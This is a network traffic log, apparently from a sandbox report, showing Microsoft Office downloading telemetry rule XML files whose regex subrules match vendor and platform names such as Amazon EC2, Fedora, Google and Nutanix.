2024-10-30 02:55:46 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


Session IDSource IPSource PortDestination IPDestination Port
42192.168.2.55255013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:46 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
ETag: "0x8DC582BB2BE84FD"
x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025546Z-16849878b78zqkvcwgr6h55x9n00000006wg00000000a5s8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:46 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
43192.168.2.55255113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:46 GMT
Content-Type: text/xml
Content-Length: 448
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB389F49B"
x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025546Z-15b8d89586f5s5nz3ffrgxn5ac000000081g00000000dpvk
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:46 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


Session IDSource IPSource PortDestination IPDestination Port
44192.168.2.55255213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:46 GMT
Content-Type: text/xml
Content-Length: 491
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B98B88612"
x-ms-request-id: b19a9190-b01e-00ab-7309-28dafd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025546Z-15b8d89586f42m673h1quuee4s0000000bhg000000007ckr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:46 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
45192.168.2.55255313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:46 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
ETag: "0x8DC582BAEA4B445"
x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025546Z-16849878b78sx229w7g7at4nkg00000005pg00000000dey8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:46 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session IDSource IPSource PortDestination IPDestination Port
46192.168.2.55255513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:47 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
ETag: "0x8DC582BA80D96A1"
x-ms-request-id: 3802ff33-701e-0001-4310-28b110000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-r197bdfb6b4bs5qf58wn14wgm000000006dg00000000k5bc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
47192.168.2.55255413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:47 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 479
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989EE75B"
x-ms-request-id: 18fe904c-c01e-00a1-4257-277e4a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-15b8d89586ffsjj9qb0gmb1stn0000000bsg0000000001w3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:47 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
48192.168.2.55255613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:47 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
ETag: "0x8DC582B97E6FCDD"
x-ms-request-id: d0d63b60-601e-0050-7d63-272c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-r197bdfb6b4bq7nf8dgr5rzeq400000002ug0000000019r0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
49192.168.2.55255813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:47 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
ETag: "0x8DC582BA54DCC28"
x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-16849878b78zqkvcwgr6h55x9n00000006u000000000ky4f
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
50192.168.2.55255913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
ETag: "0x8DC582BB7F164C3"
x-ms-request-id: e5751b3d-f01e-0099-0a8e-299171000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-r197bdfb6b4bs5qf58wn14wgm000000006mg0000000025kr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
51192.168.2.55256013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
ETag: "0x8DC582BA48B5BDD"
x-ms-request-id: 12c3b8a8-601e-0084-2933-2a6b3f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-r197bdfb6b48v72xb403uy6hns000000081g00000000dm68
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
52192.168.2.55256113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:47 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
ETag: "0x8DC582B9FF95F80"
x-ms-request-id: 57638fd1-a01e-0053-7b67-288603000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025547Z-15b8d89586ffsjj9qb0gmb1stn0000000bqg000000003zgg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
53192.168.2.55256213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:47 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
ETag: "0x8DC582BB650C2EC"
x-ms-request-id: 9a8e6971-501e-0078-586f-2806cf000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-15b8d89586f8l5961kfst8fpb00000000k5g000000008k0y
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
